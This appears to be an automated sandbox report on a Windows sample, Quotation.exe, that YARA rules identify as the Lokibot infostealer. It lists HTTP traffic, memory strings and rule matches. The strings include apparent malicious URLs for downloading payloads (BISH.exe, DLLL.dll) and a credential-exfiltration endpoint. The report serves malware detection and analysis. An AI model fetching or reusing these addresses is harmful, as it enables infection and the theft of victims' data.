Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:48:07 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cLA0Ax1lEnhWD%2BXj%2FJDwLeXjXQShl%2Be2TUP7z9PqBEYAfSiO6rZU8zNStTH7EmSU2L2%2B3QNjN0ivjp2vlybdW3mc2mygEazE2kEGvPpBsftL6cpvFW5aIz2zbV01Ql8y"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc5d37f188cba-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1850&min_rtt=1850&rtt_var=925&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:48:09 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yRv%2BlbJFZakoqDkA1kIn8Y9XqfroC8aGrc%2B5tezhHv5B7dWW0cFXZjGzv4a6t8jXuvmMf091eblqa54V99ooclsGg71FBH6NP0DBhupVsPIjIuOvQiU3hKpvVBJJksAZ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc5dd899143e0-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1744&min_rtt=1744&rtt_var=872&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:48:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fYKtqjyeZ3e%2B%2FbAQr2aiy2cjKqXALHVAcD4S6mavlFv%2FlcCrQD%2FIxgQ%2FSBCKSUZ7TcuSisN1mek1GlxowZWwYb7arBR4lPRRn5PIu6lMjGqf2JRAP1jYCkV4TY0uABYr"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc5e7e96e4210-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=32356&min_rtt=32356&rtt_var=16178&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:48:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H8K%2FzMXBw09wxU1WS%2BF%2BGnGOiuHkSRsZtuISNyFPjGR0akUXSgTIfEuWrwNIDxUiUvshgk4zUVmFxYWGAua7oWbC6Uh74tLLHAhOwaX2F5sbcLdBm9djzkn5zOEzABL4"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc5f1ea101831-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1648&min_rtt=1648&rtt_var=824&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:48:14 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QIp6uCmmptqBTKHOLjWTyaw0M5MpVBqKA2MrBRZkcC%2FCqUUz9kW%2Fccb1O3nVOR%2Fh74hHVW%2F5asDmPxHttdehEhETGBh28o3tjOQkwKHnRIUoxFFzpgFjAFNSIyFeGJaA"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc5fc0cc86a59-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2493&min_rtt=2493&rtt_var=1246&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:48:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c18etN%2BJXMLJc7QknYiL8XaSz%2FzxhyHIbIBtirCWy1hqah7rYPhZeZUohdUvDlBePR9M7sx7Po2FH6jWjrCuIxpjytYdkdCK6s9WlHlKLKcAq%2By1SKS0gJxaQjkfWaSX"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc606c96d5e74-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1747&min_rtt=1747&rtt_var=873&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=95&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:48:17 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gE6M7G7JY8cpmYXn3mBOWVPBzk%2FHbkSQbvFdjw247j4AnJRFyOhL6MF9o%2BUZZOoVuFyWY%2FXuGgsuOs%2Bjr7fMid6YYHVbK9oOYik%2Fitjs11JSmcvHv3jJWOSdfKl3LUUx"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc61118904370-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1714&min_rtt=1714&rtt_var=857&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:48:19 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VMo4K574mjZdnjZjRpbGXrjYJSRwc%2FmByUfj3rFs3RL765YY70A85nWus%2Bdyeyu7mHlgoIGXC8Q9sRwOZgivpUt3YmXYJoF%2Ful1XjGixv1WlrlMQZ%2B%2BX58ajCbwOK51l"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc61bab727c94-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2048&min_rtt=2048&rtt_var=1024&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:48:21 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NAA9vJx2cdByg52MxsGCH6UNW7evNFAVsDHvUCHsov1NfSxucUThc8xZVXsol1m9SxW%2Bma5UN5blULNNCySJOPmzE1f86GTyaAKqJTaKXqo0AQ6Uci12dvdfdPXLWs6e"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc625ff95c360-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1624&min_rtt=1624&rtt_var=812&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=136&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:48:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xsjfDA2jAQYrL7Uhgt4KjBSYIuV4Tk4loAG93xo1I%2F7tocjsTTmvZ5yJC3FOPme4xJuUaIpGFMV1om7ZjIxzR1lIGlEl23Z1E3A2Nb6UfWN%2F56JQTZVRZShc7l4o6VRI"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc630b9b25e7f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1578&min_rtt=1578&rtt_var=789&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:48:24 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C%2BWcrokjlg1P4VAOINhsL2nUvS7WTsnqI9wlIYxSHX3keN4%2BWKwhNE%2B0JL60KRqHKtlKUEoOUYqdmKfZdJOzj1L9wn2z70mZCeIfSCuRLHKnXAjN7aHk0I9eEAzcRpxN"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc63b3a3f7c6f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1810&min_rtt=1810&rtt_var=905&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:48:26 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lWVCD81poYOmQDUVSAcgf%2B2SvP1PQk6W%2FEx0wwiXDXZ8NFumwYXsE6vVgRYqsUPM0xMiIsmJ401qbpILO2c5TyaTSk1Ps2%2BSgtrlbLo%2B9iFkvcnrBsXyuFC3SjgvH42c"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc64539f11885-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1691&min_rtt=1691&rtt_var=845&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:48:27 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9m0VEKAtV074q86NLvh5O21sX%2BwX6Hdy9q670rt6kgfbs7VyBffVPDPXa6io3%2F%2FVjkn5Ah0bOwdVWuSf8S8umR79aD7aRuE7SDEhx0ey8OpsQKKSZmXI9KrzD0i%2Fogy%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc64fac7c42c2-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1617&min_rtt=1617&rtt_var=808&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Source: Quotation.exe, 00000002.00000002.1343184318.00000000026E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dddotx.shop
Source: Quotation.exe, 00000002.00000002.1343184318.00000000026E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dddotx.shopd
Source: Quotation.exe, 00000002.00000002.1343184318.00000000026D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: aspnet_compiler.exe, aspnet_compiler.exe, 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/
Source: Quotation.exe, 00000002.00000002.1343184318.00000000026D2000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000002.00000002.1343184318.000000000272D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dddotx.shop
Source: Quotation.exe, 00000002.00000002.1343184318.000000000272D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dddotx.shop/BISH.exe
Source: Quotation.exe, 00000002.00000002.1343184318.00000000026D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dddotx.shop/BISH.exe8https://dddotx.shop/DLLL.dll
Source: Quotation.exe, 00000002.00000002.1343184318.0000000002791000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dddotx.shop/DLLL.dll
Source: aspnet_compiler.exe, 00000005.00000002.2554104862.00000000013C7000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2553316944.000000000049F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://dvlref.online/BISH/PWS/fre.php
Source: aspnet_compiler.exe, 00000005.00000002.2554104862.00000000013C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dvlref.online/BISH/PWS/fre.php%

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown

HTTPS traffic detected: 104.21.12.202:443 -> 192.168.2.7:49700 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: sslproxydump.pcap, type: PCAP	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: sslproxydump.pcap, type: PCAP	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: sslproxydump.pcap, type: PCAP	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.Quotation.exe.270d2b0.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 2.2.Quotation.exe.270d2b0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 2.2.Quotation.exe.3699570.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 2.2.Quotation.exe.3699570.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 2.2.Quotation.exe.3699570.3.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 2.2.Quotation.exe.3699570.3.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 5.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 5.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 5.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 2.2.Quotation.exe.3699570.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 2.2.Quotation.exe.3699570.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 2.2.Quotation.exe.3699570.3.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 2.2.Quotation.exe.3699570.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.Quotation.exe.3699570.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 5.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 5.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 5.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 5.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000002.00000002.1343184318.000000000270A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000002.00000002.1343631435.0000000003699000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000002.00000002.1343631435.0000000003699000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000002.00000002.1343631435.0000000003699000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.1343184318.00000000027AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000002.00000002.1343184318.00000000027AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000002.00000002.1343184318.00000000027AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.1343631435.0000000003679000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000002.00000002.1343631435.0000000003679000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: Quotation.exe PID: 4828, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: aspnet_compiler.exe PID: 1648, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Quotation.exe

Source: C:\Users\user\Desktop\Quotation.exe	Code function: 2_2_026017F0	2_2_026017F0
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 2_2_026017DF	2_2_026017DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 5_2_0040549C	5_2_0040549C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 5_2_004029D4	5_2_004029D4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 00405B6F appears 42 times

Source: Quotation.exe, 00000002.00000002.1343184318.0000000002788000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameDEMONCODER.dll6 vs Quotation.exe
Source: Quotation.exe, 00000002.00000002.1343737275.0000000004BC0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameDEMONCODER.dll6 vs Quotation.exe
Source: Quotation.exe, 00000002.00000000.1280595204.0000000000388000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: OriginalFilenameBish.exe* vs Quotation.exe
Source: Quotation.exe, 00000002.00000002.1343184318.0000000002702000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameDEMONCODER.dll6 vs Quotation.exe
Source: Quotation.exe, 00000002.00000002.1343184318.0000000002791000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameDEMONCODER.dll6 vs Quotation.exe
Source: Quotation.exe, 00000002.00000002.1342727232.000000000098E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Quotation.exe
Source: Quotation.exe	Binary or memory string: OriginalFilenameBish.exe* vs Quotation.exe

Source: Quotation.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: sslproxydump.pcap, type: PCAP	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: sslproxydump.pcap, type: PCAP	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: sslproxydump.pcap, type: PCAP	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.Quotation.exe.270d2b0.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 2.2.Quotation.exe.270d2b0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 2.2.Quotation.exe.3699570.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 2.2.Quotation.exe.3699570.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 2.2.Quotation.exe.3699570.3.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 2.2.Quotation.exe.3699570.3.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
